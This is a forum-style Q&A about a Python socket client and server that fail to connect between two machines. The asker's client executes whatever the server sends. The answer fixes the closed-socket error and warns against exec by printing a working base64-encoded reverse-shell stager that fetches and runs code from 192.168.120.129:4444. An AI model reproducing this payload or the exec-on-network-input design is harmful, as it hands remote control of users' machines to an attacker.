python sockets not connecting on two different machines

Question

I recently learnt socket library in python. I'm coding a game's multiplayer server but before coding the whole multiplayer server I decided to code a small server just for seeing how a server works in python. When I coded the server it was awkward that my code was working fine when I ran the client and server on my own windows 10 computer , it connected and did it's work(it's work is two get the IP from hostname, but the client will send hostname and the code for getting IP is executed in the server and sent back to the client) but when I shared the client file with my friend then the client and server did not connect, there was no error message or something else, firewall is not blocking any connections, so why aren't they connecting? Here's the code in the server file(The print statements are just for making a loading bar effect):

import socket
from time import sleep
#Default port number: 1234
server=socket.socket()
def run_server(port=1234):
    print('Booting server...')
    print('|-|-|-',end='')
    sleep(0.05)
    server.bind(('',port))
    print('|-|-|-',end='')
    sleep(0.05)
    server.listen(5)
    print('|-|-|',end='')
    sleep(0.05)
    print('\nServer is running and can be accessed now\n===============================================')
    while True:
        c,addr=server.accept()
        print('recieved connection from: ',addr)
        c.send(bytes("ip=bytes(input('Welcome. Enter hostname to extract ip from: '),'utf-8')",'utf-8'))
        c.send(bytes('_socket.send(ip)','utf-8'))
        reply=c.recv(1024).decode('utf-8')
        try:
            ip=socket.gethostbyname(reply)
        except:
           c.send(bytes('''print("The hostname is either invalid or wasn't found")''','utf-8'))
           c.send(bytes('_socket.close()','utf-8'))
           continue
        c.send(bytes("print('"+ip+"')",'utf-8'))
        c.send(bytes('_socket.close()','utf-8'))
run_server()

And the code in the client:

import socket
def run(mode='client'):
    _socket=socket.socket()
##    if mode=='client':
    _socket.connect(('192.168.0.101',1234))
##        return True
    while True:
        command=_socket.recv(1024).decode('utf-8')
        exec(command)
##    if mode=='server':
##        _socket.bind((socket.gethostname(),1234))
##        _socket.listen(5)
##        while True:
##            client,addr=_socket.accept()
##            msg=client.recv(1024)
##            if msg[-1]!=b'.':
##                continue
##            else:
##                _socket.close()
##                break
##        return pickle.loads(msg)
while True:
    try:
        run()
    except OSError:
        continue

(ignore the commented code, I just kept it so I can copy it in other files when needed)

ADDITIONAL INFO(which I missed before): In the client.py file, you'll see the last few lines are a try and except OSError block. I added this block because I don't know why but when I run the client, I get this error:

Traceback (most recent call last):
  File "C:\Users\DEVDHRITI\Desktop\Files&Folders\HMMMMM\python\client.py", line 24, in <module>
    run()
  File "C:\Users\DEVDHRITI\Desktop\Files&Folders\HMMMMM\python\client.py", line 8, in run
    command=_socket.recv(1024).decode('utf-8')
OSError: [WinError 10038] An operation was attempted on something that is not a socket

When I hide this error using the try and except blocks, there's no difference, the client works fine without showing any problems. Does anyone know why is this happening?

Answer 1

An operation was attempted on something that is not a socket usually means that you're attempting to do operations on a closed socket. I haven't run your code, but what I believe is happening is you have your server sending a single command to the client, then instructing the client to close. The client however attempts to accept infinite messages from the server; even after the client's socket has been closed.

Either have the client only accept a single message, or stop having the server tell the client to close itself.

I'd change the client code to something like this:

try:
    while True:
        command=_socket.recv(1024).decode('utf-8')
except KeyboardInterrupt:
    _socket.close()

And now the client can press ctrl+c to close itself when it wants to exit.

---

Also, do not ever use exec like you are; especially without checking what you're about to execute. If the server was ever compromised, or the server owner became malicious, or if you swapped it and had the client send commands to the server, you're opening yourself up to having the machine running exec to become compromised. If the sending end of the socket sent code like this for example:

# Do not run this!
exec(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMTIwLjEyOScsNDQ0NCkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==')[0]))

This would cause the exec'ing computer to start up a reverse TCP shell, and give control of their computer to the other machine! The other end would then be able to do anything they want on your computer (or, at least whatever they have the access rights to do).

You should never really ever use eval or exec unless it's used in a place where user's code will never enter it. Feeding user input directly into exec is extraordinarily dangerous and should be avoided at all costs.